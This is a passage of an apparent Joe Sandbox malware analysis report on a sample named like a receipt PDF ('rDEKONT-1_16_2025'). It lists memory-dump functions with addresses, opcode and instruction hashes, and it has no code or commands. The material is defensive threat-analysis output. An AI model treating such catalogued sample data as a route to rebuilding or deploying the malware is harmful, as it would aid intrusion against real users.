                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4c685ddf271b0993641961704f82e22f00adad6d38debdeb3c9fe8259a77191a
                                                                                                                                                          • Instruction ID: 81872534d5de87f5b916543124e4f05d5ffd19f59af50866ff64ff3bb05dced0
                                                                                                                                                          • Opcode Fuzzy Hash: 4c685ddf271b0993641961704f82e22f00adad6d38debdeb3c9fe8259a77191a
                                                                                                                                                          • Instruction Fuzzy Hash: CB01D3B4E0520EDFCB44DFA9D5455AEBBF6AB98300F10C4AAD819E3354EB709A11CB52
                                                                                                                                                          Function 0B848658 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c4391518b85406d977de98bf9d4e9aefef631bfae1e1133677a065c6bff7edde
                                                                                                                                                          • Instruction ID: 131750751283cbc13e3b34941d0f0edf16ce50392809b19645e9cc393a03fd1c
                                                                                                                                                          • Opcode Fuzzy Hash: c4391518b85406d977de98bf9d4e9aefef631bfae1e1133677a065c6bff7edde
                                                                                                                                                          • Instruction Fuzzy Hash: 98018F74E0520ADFCB84CFB4D54A29DBFF2AB85310F24D0AAD408E3764E7348A44CB15
                                                                                                                                                          Function 0B84CAB3 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 31221a04a3a542394a950908efd4abbe6b8d082895d0ee19f538b63f33a23ae4
                                                                                                                                                          • Instruction ID: 05546c1298ab0da20cebe9ad14f006945bea6688d349355fc8e23d9aa0a04d79
                                                                                                                                                          • Opcode Fuzzy Hash: 31221a04a3a542394a950908efd4abbe6b8d082895d0ee19f538b63f33a23ae4
                                                                                                                                                          • Instruction Fuzzy Hash: 28015E74649148DFCB01DBA8C584AADBFFAEF4A310F19D1C594599B2B2C7309D41DF42
                                                                                                                                                          Function 0B84CAC0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 845b946d3c3aa9fca5d98dfbdb6242ce36135b3f9faaa950fce3f1359e89d441
                                                                                                                                                          • Instruction ID: ce84af4fe66fdbc0940c8315e0bac4756fece87cd11a946223eee301340d1c0b
                                                                                                                                                          • Opcode Fuzzy Hash: 845b946d3c3aa9fca5d98dfbdb6242ce36135b3f9faaa950fce3f1359e89d441
                                                                                                                                                          • Instruction Fuzzy Hash: F301FBB4A4510CEFCB44DFA9C648AADBBFAFB49304F15D09494099B365DB309E44DF41
                                                                                                                                                          Function 056FB068 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7e4ccdef7fc6b76f5e3bc3dd5e097767b4f8552168e8a181e1ba151791602406
                                                                                                                                                          • Instruction ID: 1859c3bc4f668e447c5e8d0d23bb5371aa628615a4070d20eddef1fca99e045f
                                                                                                                                                          • Opcode Fuzzy Hash: 7e4ccdef7fc6b76f5e3bc3dd5e097767b4f8552168e8a181e1ba151791602406
                                                                                                                                                          • Instruction Fuzzy Hash: 04014B306102008FC714DA29D840D2AB3EAFFC5220B60C579D61A877A4DB71EC46CB50
                                                                                                                                                          Function 0B84E544 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d326753b9dce984de5936d46ca69f84bebfd6a05582e03ffb1861317c73aa18d
                                                                                                                                                          • Instruction ID: 5785245fde14aeaf6018902ab3fd1fbd63047a8d579df91645d7cac326dd633e
                                                                                                                                                          • Opcode Fuzzy Hash: d326753b9dce984de5936d46ca69f84bebfd6a05582e03ffb1861317c73aa18d
                                                                                                                                                          • Instruction Fuzzy Hash: 30118B7090921DCFC704CF98E584A98BBF9FB49316F0491A9E40AD7321DB349C85CF10
                                                                                                                                                          Function 056FF170 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 66ef8147d96f60d9ba4c198d382aa6d2e70a727748cab0c5289652b6cb5086c9
                                                                                                                                                          • Instruction ID: d9973dedc83386ae01796938116bc140f73d5ba34137d79b2d04e7c762acba54
                                                                                                                                                          • Opcode Fuzzy Hash: 66ef8147d96f60d9ba4c198d382aa6d2e70a727748cab0c5289652b6cb5086c9
                                                                                                                                                          • Instruction Fuzzy Hash: 94F0BB75F002549B8F15F7A958549BEBBBAEBC8618F00002CE705AB340DE301E01C7E9
                                                                                                                                                          Function 056F9A5C Relevance: .0, Instructions: 40COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 38e90c32b7dbbc383cc2ac0435e668c0958f6a7f6323b54061ca205d770bf8b4
                                                                                                                                                          • Instruction ID: 3bce65a2be3d17c7af3eb9dad54fc39432651cb4b4310493c9fd8b4c349755b9
                                                                                                                                                          • Opcode Fuzzy Hash: 38e90c32b7dbbc383cc2ac0435e668c0958f6a7f6323b54061ca205d770bf8b4
                                                                                                                                                          • Instruction Fuzzy Hash: B5F0F0323002486BCB05AEAD8884ABF7FABEBC9350B004429FB0687350CE21DC51D7A4
                                                                                                                                                          Function 0B847060 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e120be926555de316b7555cabfe80e17a1327d2c5c6cc40597908418f1769385
                                                                                                                                                          • Instruction ID: ce2a2c7d6bf55ab0a4dfcd57084407bac17739140b0ac85e397078d063f84a14
                                                                                                                                                          • Opcode Fuzzy Hash: e120be926555de316b7555cabfe80e17a1327d2c5c6cc40597908418f1769385
                                                                                                                                                          • Instruction Fuzzy Hash: 9701F6B8D0520A9FCB54DFB8D5026AEBBF5EB09310F1084AAD858E7391E7745A41CF61
                                                                                                                                                          Function 0B848668 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c5860ad8cad2f6733d347c24b42ba05c833a7834c6c1236f043ae3407d1b91e4
                                                                                                                                                          • Instruction ID: 6f62464d7131bccf878df1210191fb2f043d261cee5464280a01e4ddc484f320
                                                                                                                                                          • Opcode Fuzzy Hash: c5860ad8cad2f6733d347c24b42ba05c833a7834c6c1236f043ae3407d1b91e4
                                                                                                                                                          • Instruction Fuzzy Hash: 6E013174E0520EDFCB84CFA9D54965DBBF6EB85310F24D0AA9409E3364EB349B448B15
                                                                                                                                                          Function 056FCD30 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b71371a318b4e7d5c15dec209281d749ea0ac389d97b6ff0e84d3c35b426be1b
                                                                                                                                                          • Instruction ID: 8e374d8321914d7bfff08e5251aaeb62199ca9dbeaf4f27c4f74d3b3a3585b98
                                                                                                                                                          • Opcode Fuzzy Hash: b71371a318b4e7d5c15dec209281d749ea0ac389d97b6ff0e84d3c35b426be1b
                                                                                                                                                          • Instruction Fuzzy Hash: D4F0B47050E3899EEB225328841532A7F64EF02308F19C4EBD64C8BA53CA27C847C796
                                                                                                                                                          Function 0B848884 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5c0b82a5b1f85edf3b23316b746a31d967d70e7e8ea386d06a9beed3a820af9c
                                                                                                                                                          • Instruction ID: bc157304320a1b97b376f23d72541adafe7a2036021e03d2691730cc0df81868
                                                                                                                                                          • Opcode Fuzzy Hash: 5c0b82a5b1f85edf3b23316b746a31d967d70e7e8ea386d06a9beed3a820af9c
                                                                                                                                                          • Instruction Fuzzy Hash: 24018C71D092889FC741CFA98455658BFF0EF0A210F0580DBD854DB372E7389600CB52
                                                                                                                                                          Function 0B8474F9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cc07438bfc734b3eea61451711a12c3c1acba2ff5228aaf2df91a66ea01f7cc7
                                                                                                                                                          • Instruction ID: 4643d37d7e501133388996fc0a8566081203869e61489d721f487ffaf114605f
                                                                                                                                                          • Opcode Fuzzy Hash: cc07438bfc734b3eea61451711a12c3c1acba2ff5228aaf2df91a66ea01f7cc7
                                                                                                                                                          • Instruction Fuzzy Hash: 74F08232A04208AFEB08DF98DC0299E7FFAEB99210F1481ABE404DB261E731DD108795
                                                                                                                                                          Function 056FDB27 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a06ad7ec618fdd5fc02d0efc619a99a5cfabb1a0c311b62fe8125733f491a647
                                                                                                                                                          • Instruction ID: f94543b0771c012c6f937e5bd79db869137d64418671282510f2d6f8ec0005b3
                                                                                                                                                          • Opcode Fuzzy Hash: a06ad7ec618fdd5fc02d0efc619a99a5cfabb1a0c311b62fe8125733f491a647
                                                                                                                                                          • Instruction Fuzzy Hash: 88F08C797461408FCF01DF28E846DE43BB0EA4622030011AAE504CB732D628EC46CB61
                                                                                                                                                          Function 056FCC1B Relevance: .0, Instructions: 31COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bbed106006b1c4eab6cff456c68eb1419ae342a89773bdf7b66a7a136eb2dfb8
                                                                                                                                                          • Instruction ID: 6a7b8a345ccf9aaf8ed37c5e7d9b1299b86a9bafe97501b77ee0b1c7a5d9f2bc
                                                                                                                                                          • Opcode Fuzzy Hash: bbed106006b1c4eab6cff456c68eb1419ae342a89773bdf7b66a7a136eb2dfb8
                                                                                                                                                          • Instruction Fuzzy Hash: 2BF027373002889FCB02CF68F501AEEBFA5EB85211B044457F149C7162CB359910E765
                                                                                                                                                          Function 0B847070 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ab83a5f61a1546c5e3cb8b739c696129bdece15e7672af728cd391b53f611c24
                                                                                                                                                          • Instruction ID: fd82d58b6a50113acbe154e73dc55b9eedc9a51634ddbe8e4e2d8843a437d48f
                                                                                                                                                          • Opcode Fuzzy Hash: ab83a5f61a1546c5e3cb8b739c696129bdece15e7672af728cd391b53f611c24
                                                                                                                                                          • Instruction Fuzzy Hash: 99F0F4B8D0520A9FCB54DFA9D5066AEBBF5EB48310F0080AA9818E3390EB745A00CF51
                                                                                                                                                          Function 0B84E51D Relevance: .0, Instructions: 30COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1c3a4d2873c0798eaf5df2b6a0cedf64a7edb398cbdf934f9da547797359cd77
                                                                                                                                                          • Instruction ID: 97443b7e5cb07b4e42b5c27e8edf89dfe526988d237266b57fd0b661e16c26a0
                                                                                                                                                          • Opcode Fuzzy Hash: 1c3a4d2873c0798eaf5df2b6a0cedf64a7edb398cbdf934f9da547797359cd77
                                                                                                                                                          • Instruction Fuzzy Hash: B4F0F934E4420ECFCB14CFA8D844AADBBF9FB45305F008565D825D7369E730D9468B91
                                                                                                                                                          Function 056FDC4D Relevance: .0, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b04d2e7d64fa190882e67a3d7ae3318246239a3e548402c272b1e2e20e62d090
                                                                                                                                                          • Instruction ID: 8b39b21b9d26e2f360df6d11510e5fe0c4af2fc9cd69f3c6b6c2003f5c83a5db
                                                                                                                                                          • Opcode Fuzzy Hash: b04d2e7d64fa190882e67a3d7ae3318246239a3e548402c272b1e2e20e62d090
                                                                                                                                                          • Instruction Fuzzy Hash: 92F03A70E4020A8BDB14EFB9C5587ADBAB6BF84744F04443DD202AB294DFB55880CFA5
                                                                                                                                                          Function 056F9B9C Relevance: .0, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8bbd403c1f13e7b658c5c285ce40552113675f3b2bd4331dcf04b8c44064199c
                                                                                                                                                          • Instruction ID: a6f3d6fb4cb3476fb273d5f17f3307ed9d18f50e9408305ad5ce041f611757c2
                                                                                                                                                          • Opcode Fuzzy Hash: 8bbd403c1f13e7b658c5c285ce40552113675f3b2bd4331dcf04b8c44064199c
                                                                                                                                                          • Instruction Fuzzy Hash: 29E09270A083059B8A349A159888877B7BEEB843903004A2EEA4AC3B10EA21F845C7A4
                                                                                                                                                          Function 0B84E4FE Relevance: .0, Instructions: 27COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b7d8ee89e4df2c2de9f472c62474aded12458eaab7fe5c073d6a342220b8e4b2
                                                                                                                                                          • Instruction ID: 46d17b1f17ca05ac6048ee87f84cb86e97514746c669da55224629989b0bdd8b
                                                                                                                                                          • Opcode Fuzzy Hash: b7d8ee89e4df2c2de9f472c62474aded12458eaab7fe5c073d6a342220b8e4b2
                                                                                                                                                          • Instruction Fuzzy Hash: 19F0CF34949229DFDB14CF98D980BA8BBB5BB4A215F000696D429E7394D3309E418F11
                                                                                                                                                          Function 056FF392 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c355a900fceba9843e95b1c378e738c97f9384a86d47fd54bef2257b78d06ca9
                                                                                                                                                          • Instruction ID: 6bd0aace9ff4543a7c4260904decfbb955ab1cc7144a106ef421569c7ea113b6
                                                                                                                                                          • Opcode Fuzzy Hash: c355a900fceba9843e95b1c378e738c97f9384a86d47fd54bef2257b78d06ca9
                                                                                                                                                          • Instruction Fuzzy Hash: 64E0B672F001146F9B08DEA998449AFBAFB9B84654B11857AA509D7258EA30AD4187D0
                                                                                                                                                          Function 056FCC28 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a7db9668a01ce9622d954956453482b5a33ab66700e81de78bd688ddc8a94521
                                                                                                                                                          • Instruction ID: 8979700f9d53f4f5721af8d77d0c2b7b580b5fde9897e7bbde398d7333a665cf
                                                                                                                                                          • Opcode Fuzzy Hash: a7db9668a01ce9622d954956453482b5a33ab66700e81de78bd688ddc8a94521
                                                                                                                                                          • Instruction Fuzzy Hash: 7EE092323001486FCB019E4EE800E9FBFEEDBC8310B04801AF949C3221CB75D81197A5
                                                                                                                                                          Function 056FEF39 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f08823ba8410684084b3c373ef5ac3a2bf8004555486a6e03c9d1c76e05b0e33
                                                                                                                                                          • Instruction ID: 1832554d420cbfabe5b833a88551de39cb2170d37eb708348e8a3dc53837b3c3
                                                                                                                                                          • Opcode Fuzzy Hash: f08823ba8410684084b3c373ef5ac3a2bf8004555486a6e03c9d1c76e05b0e33
                                                                                                                                                          • Instruction Fuzzy Hash: 54F039321052999FCB028F90D984C89BFB6FB06314706C2ABE5158B272C336DA59DB40
                                                                                                                                                          Function 0B84C879 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9b1801eae5c86467413a358541b8dc0cc55acd5bec4441177f14454ae60c6c59
                                                                                                                                                          • Instruction ID: f6c568a93bfce668061a0f432507b6e1492c2072eede41da40faeca3884fc22c
                                                                                                                                                          • Opcode Fuzzy Hash: 9b1801eae5c86467413a358541b8dc0cc55acd5bec4441177f14454ae60c6c59
                                                                                                                                                          • Instruction Fuzzy Hash: F0F01C74905248DFCB04CFA9D0959AE7FF9EF49701B008059E82AEB262C7349441CF51
                                                                                                                                                          Function 0B84A3E8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3d7c5fcdee02e72692d85a20a3062e6aea651ee691521faa13cbcf5ff9f6d4b3
                                                                                                                                                          • Instruction ID: 9727b8fe4f1df632ac6106fc50f90f910ffbf7f243b9e3b23d7b0aa5a8791ee2
                                                                                                                                                          • Opcode Fuzzy Hash: 3d7c5fcdee02e72692d85a20a3062e6aea651ee691521faa13cbcf5ff9f6d4b3
                                                                                                                                                          • Instruction Fuzzy Hash: 66F015B0D0021ADFCB48DFA8C4456ADBBF1FB48310F1085AAD814E7320D7715A41DF90
                                                                                                                                                          Function 056FCB24 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f42bc6483755754c7fe3e3b0a34c4cc190eec148ef459d4411c5b6cf6d87b7b8
                                                                                                                                                          • Instruction ID: b8245f3027c49cd72dbb506e56f943695db07fbd8414bd6431e2a4864bf9176b
                                                                                                                                                          • Opcode Fuzzy Hash: f42bc6483755754c7fe3e3b0a34c4cc190eec148ef459d4411c5b6cf6d87b7b8
                                                                                                                                                          • Instruction Fuzzy Hash: 46F09DB8E0421A9FEB04DF84C5809ADFBB1BB88700F108299E915AB350C670AD44CFA4
                                                                                                                                                          Function 0B848840 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 829ff1b64cde8a64af6e1615cdf32578da0a2409a72db069aeaa3a7788d2fbe2
